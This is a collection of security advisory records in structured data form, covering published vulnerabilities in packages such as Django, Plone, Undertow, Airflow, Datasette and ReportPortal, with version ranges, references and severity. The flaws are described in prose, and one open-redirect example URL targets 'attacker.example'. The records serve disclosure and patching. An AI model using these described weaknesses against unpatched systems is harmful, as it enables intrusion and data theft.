[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:activemq-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.16.0'}, {'fixed': '5.16.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:activemq-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.15.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:apache-artemis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26117'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/AMQ-8035'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/ARTEMIS-2895'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r110cacfa754471361234965ffe851a046e302ff2693b055f49f47b02@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22cdc0fb45e223ac92bc2ceff7af92f1193dfc614c8b248534456229@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3341d96d8f956e878fb7b463b08d57ca1d58fec9c970aee929b58e0d@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r519bfafd67091d0b91243efcb1c49b1eea27321355ba5594f679277d@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5899ece90bcae5805ad6142fdb05c58595cff19cb2e98cc58a91f55b@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70389648227317bdadcdecbd9f238571a6047469d156bd72bb0ca2f7@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra255ddfc8b613b80e9fa22ff3e106168b245f38a22316bfb54d21159@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea451de09baed76950d6a60cc4bb1b74476c505e03205a3c68c9808@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd05b1c9d61dbd220664d559aa0e2b55e5830f006a09e82057f3f7863@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd75600cee29cb248d548edcf6338fe296466d63a69e2ed0afc439ec7@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re1b98da90a5f2e1c2e2d50e31c12e2578d61fe01c0737f9d0bd8de99@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec93794f8aeddf8a5f1a643d264b4e66b933f06fd72a38f31448f0ac@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rffa5cd05d01c4c9853b17f3004d80ea6eb8856c422a8545c5f79b1a6@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00005.html'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/activemq-users/202101.mbox/%3cCAH+vQmMeUEiKN4wYX9nLBbqmFZFPXqajNvBKmzb2V8QZANcSTA@mail.gmail.com%3e'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210304-0008/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]
{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T22:53:40Z', 'nvd_published_at': '2021-01-27T19:15:00Z'}
1.4.0
GHSA-89v2-g37m-g3ff
2021-06-01T18:53:10Z
2021-06-01T21:18:53Z
null
[]
Improper Verification of Cryptographic Signature in aws-encryption-sdk-cli
### Impact This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. ### Patches Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x ### Workarounds None ### For more information https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
[]
[{'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-cli/security/advisories/GHSA-89v2-g37m-g3ff'}]
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:53:10Z', 'nvd_published_at': None}
1.4.0
GHSA-9h4h-8w5p-f28w
2021-05-20T18:58:40Z
2021-06-29T21:23:15Z
null
['CVE-2018-19184']
Denial of Service in geth
cmd/evm/runner.go in Go Ethereum (aka geth) allows attackers to cause a denial of service (SEGV) via crafted bytecode.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/cmd/evm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.14'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-19184'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/issues/18069'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/83e2761c3a13524bd5d6597ac08994488cf872ef'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/fb9f7261ec51e38eedb454594fc19f00de1a6834'}]
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T18:58:40Z', 'nvd_published_at': None}
1.4.0
GHSA-rfhr-62xp-2fp2
2021-05-27T22:38:20Z
2021-06-08T23:19:21Z
null
['CVE-2021-23387']
Open Redirect in trailing-slash
The package trailing-slash before 2.0.1 are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::createTrailing(), as the web server uses relative URLs instead of absolute URLs.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'trailing-slash'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23387'}, {'type': 'WEB', 'url': 'https://github.com/fardog/trailing-slash/commit/f8e66f1429308247e5a119d430203077d8f05048'}, {'type': 'WEB', 'url': 'https://github.com/fardog/trailing-slash/blob/f640ece055fe85275c983de5eb94661b95e35670/index.js%23L36'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TRAILINGSLASH-1085707'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:38:20Z', 'nvd_published_at': '2021-05-24T19:15:00Z'}
1.4.0
GHSA-qjwc-v72v-fq6r
2022-02-11T21:11:27Z
2021-06-16T17:47:52Z
null
['CVE-2021-20220']
HTTP request smuggling in Undertow
A flaw was found in Undertow. A regression in the fix for CVE-2020-10687 was found. HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own. The highest threat from this vulnerability is to data confidentiality and integrity.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.34'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20220'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/commit/9e797b2f99617fdad0471eaa88c711ee7f44605f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1923133'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0013/'}]
{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:33:57Z', 'nvd_published_at': '2021-02-23T18:15:00Z'}
1.4.0
GHSA-gpmh-g94g-qrhr
2021-06-24T19:20:56Z
2021-06-28T18:20:53Z
null
[]
Internal hidden fields are visible on to many associations in admin api
### Impact The admin api has exposed some internal hidden fields when an association has been loaded with a to many reference ### Patches We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 ### Workarounds For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-gpmh-g94g-qrhr'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:20:56Z', 'nvd_published_at': None}
1.4.0
GHSA-5gjg-jgh4-gppm
2021-10-05T16:37:09Z
2021-06-23T17:26:30Z
null
[]
Websocket requests did not call AuthenticateMethod
### Impact Depending on implementation, a denial-of-service or privilege escalation vulnerability may occur in software that uses the `github.com/ecnepsnai/web` package with Web Sockets that have an AuthenticateMethod. The `AuthenticateMethod` is not called, and `UserData` will be nil in request methods. Attempts to read the `UserData` may result in a panic. This issue only affects web sockets where an `AuthenticateMethod` is supplied to the handle options. Users who do not use web sockets, or users who do not require authentication are not at risk. #### Example In the example below, one would expect that the `AuthenticateMethod` function would be called for each request to `/example` ```go handleOptions := web.HandleOptions{ AuthenticateMethod: func(request *http.Request) interface{} { // Assume there is logic here to check for an active sessions, look at cookies or headers, etc... var session Session{} // Example return session }, } server.Socket("/example", handle, handleOptions) ``` However, the method is not called, and therefor the `UserData` parameter of the request object in the handle will be nil, when it would have been expected to be the `session` object we returned. ### Patches Release v1.5.2 fixes this vulnerability. The authenticate method is now called for websocket requests. All users of the web package should update to v1.5.2 or later. ### Workarounds You may work around this issue by making the authenticate method a named function, then calling that function at the start of the handle method for the websocket. Reject connections when the return value of the method is nil.
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ecnepsnai/web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.5.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ecnepsnai/web/security/advisories/GHSA-5gjg-jgh4-gppm'}, {'type': 'WEB', 'url': 'https://github.com/ecnepsnai/web/commit/5a78f8d5c41ce60dcf9f61aaf47a7a8dc3e0002f'}, {'type': 'PACKAGE', 'url': 'https://github.com/ecnepsnai/web'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0107'}]
{'cwe_ids': ['CWE-304'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:41:20Z', 'nvd_published_at': None}
1.4.0
GHSA-hm2p-fhwx-9285
2021-05-27T21:32:19Z
2021-06-15T16:11:38Z
null
['CVE-2021-33509']
Incorrect Permission Assignment for Critical Resource in Plone
Plone through 5.2.4 allows remote authenticated managers to perform disk I/O via crafted keyword arguments to the ReStructuredText transform in a Python script.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33509'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/writing-arbitrary-files-via-docutils-and-python-script'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]
{'cwe_ids': ['CWE-732'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:32:19Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}
1.4.0
GHSA-mv55-23xp-3wp8
2021-06-15T19:56:20Z
2021-06-08T20:09:36Z
null
['CVE-2021-3495']
Access control flaw in Kiali
An incorrect access control flaw was found in the kiali-operator in versions before 1.33.0. This flaw allows an attacker with a basic level of access to the cluster (to deploy a kiali operand) to use this vulnerability and deploy a given image to anywhere in the cluster, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.33.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3495'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali-operator/pull/278'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1947361'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-003/'}]
{'cwe_ids': ['CWE-281'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-02T20:54:29Z', 'nvd_published_at': '2021-06-01T14:15:00Z'}
1.4.0
GHSA-68w8-qjq3-2gfm
2022-02-14T22:19:16Z
2021-06-10T17:21:00Z
null
['CVE-2021-33203']
Path Traversal in Django
Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.24'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33203'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/053cc9534d174dc89daba36724ed2dcb36755b90'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/20c67a0693c4ede2b09af02574823485e82e4c8f'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/dfaba12cda060b8b292ae1d271b44bf810b1c5b9'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210727-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jun/02/security-releases/'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:57:27Z', 'nvd_published_at': '2021-06-08T18:15:00Z'}
1.4.0
GHSA-8f4m-hccc-8qph
2021-06-04T18:56:16Z
2021-06-01T21:38:33Z
null
['CVE-2021-20191']
Insertion of Sensitive Information into Log File in ansible
A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.19'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0'}, {'fixed': '2.10.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20191'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/73488'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/73489'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2021-20191'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1916813'}]
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:27:31Z', 'nvd_published_at': '2021-05-26T21:15:00Z'}
1.4.0
GHSA-xw7c-jx9m-xh5g
2021-10-05T17:23:33Z
2021-06-07T21:47:41Z
null
[]
Reflected cross-site scripting issue in Datasette
### Impact The `?_trace=1` debugging feature in Datasette does not correctly escape generated HTML, resulting in a [reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as [datasette-auth-passwords](https://datasette.io/plugins/datasette-auth-passwords) as an attacker could use the vulnerability to access protected data. ### Patches Datasette 0.57 and 0.56.1 both include patches for this issue. ### Workarounds If you run Datasette behind a proxy you can workaround this issue by rejecting any incoming requests with `?_trace=` or `&_trace=` in their query string parameters. ### References - [OWASP guide to reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) - [Datasette issue #1360](https://github.com/simonw/datasette/issues/1360) ### For more information If you have any questions or comments about this advisory: * Open a discussion in [simonw/datasette](https://github.com/simonw/datasette/discussions) * Email us at `swillison+datasette @ gmail.com`
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'datasette'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.56.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/simonw/datasette/security/advisories/GHSA-xw7c-jx9m-xh5g'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonw/datasette'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-07T20:59:14Z', 'nvd_published_at': None}
1.4.0
GHSA-4mg4-wvmx-5332
2021-05-27T21:39:48Z
2021-06-15T16:11:47Z
null
['CVE-2021-33510']
Server-Side Request Forgery in Plone
Plone through 5.2.4 allows remote authenticated managers to conduct SSRF attacks via an event ical URL, to read one line of a file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33510'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/server-side-request-forgery-via-event-ical-url'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]
{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:39:48Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}
1.4.0
GHSA-3xxv-p78r-4fc6
2023-08-30T22:11:04Z
2021-06-18T18:43:42Z
null
['CVE-2021-28359']
Cross-site Scripting in Apache Airflow
The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions <1.10.15 in 1.x series and affects 2.0.0 and 2.0.1 and 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515 but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH releases of the installed MINOR versions, example update to Python 3.6.13 if you are on Python 3.6. (Those contain the fix for CVE-2021-23336 https://nvd.nist.gov/vuln/detail/CVE-2021-23336).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.15'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28359'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8ce70088ba291f358e077cafdb14d174b7a1ce9a9d86d1b332d6367%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc005f4de9d9b0ba943ceb8ff5a21a5c6ff8a9df52632476698d99432@%3Cannounce.apache.org%3E'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:17:09Z', 'nvd_published_at': '2021-05-02T08:15:00Z'}
1.4.0
GHSA-2jx8-v4hv-gx3h
2021-10-05T17:29:41Z
2021-06-28T16:45:47Z
null
['CVE-2020-12642']
XXE vulnerability in Launch import
| Release Date | Affected Projects | Affected Versions | Access Vector| Security Risk | |--------------|-------------------|-------------------|---------------|---------------| | Monday, May 4, 2020| [service-api](https://github.com/reportportal/service-api) | Every version, starting from 3.1.0 | Remote | Medium | ### Impact Starting from version 3.1.0 we introduced a new feature of JUnit XML launch import. Unfortunately XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file that uses external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. Report Portal versions 4.3.12+ and 5.1.1+ disables external entity resolution for theirs XML parser. We advise our users install the latest releases we built specifically to address this issue. ### Patches Fixed with https://github.com/reportportal/service-api/pull/1201 ### Binary Download https://bintray.com/epam/reportportal/service-api/5.1.1 https://bintray.com/epam/reportportal/service-api/4.3.12 ### Docker Container Download * RP v4: `docker pull reportportal/service-api:4.3.12` * RP v5: `docker pull reportportal/service-api:5.1.1` ### Acknowledgement The issue was reported to Report Portal Team by an external security researcher. Our Team thanks Julien M. for reporting the issue. ### For more information If you have any questions or comments about this advisory email us: [support@reportportal.io](mailto:support@reportportal.io)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '4.3.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/reportportal/reportportal/security/advisories/GHSA-2jx8-v4hv-gx3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12642'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/pull/1201'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/commit/da4a012abdcc69f02f4255d81466f1f473b7f418'}, {'type': 'PACKAGE', 'url': 'https://github.com/reportportal/reportportal'}]
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T16:45:26Z', 'nvd_published_at': '2020-05-04T16:15:00Z'}
1.4.0
GHSA-57v4-m9jx-mh8r
2023-02-13T17:29:53Z
2021-06-08T23:05:19Z
null
['CVE-2021-3499']
Improper Input Validation
A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ovn-org/ovn-kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3499'}, {'type': 'WEB', 'url': 'https://github.com/ovn-org/ovn-kubernetes/pull/2169'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHBA-2021:1550'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-3499'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1949188'}]
{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T21:24:52Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}
1.4.0
GHSA-32wr-8wxm-852c
2021-04-07T22:08:23Z
2021-06-22T15:24:59Z
null
['CVE-2019-7725']
Deserialization of Untrusted Data in NukeViet
includes/core/is_user.php in NukeViet before 4.3.04 deserializes the untrusted nvloginhash cookie (i.e., the code relies on PHP's serialization format when JSON can be used to eliminate the risk).
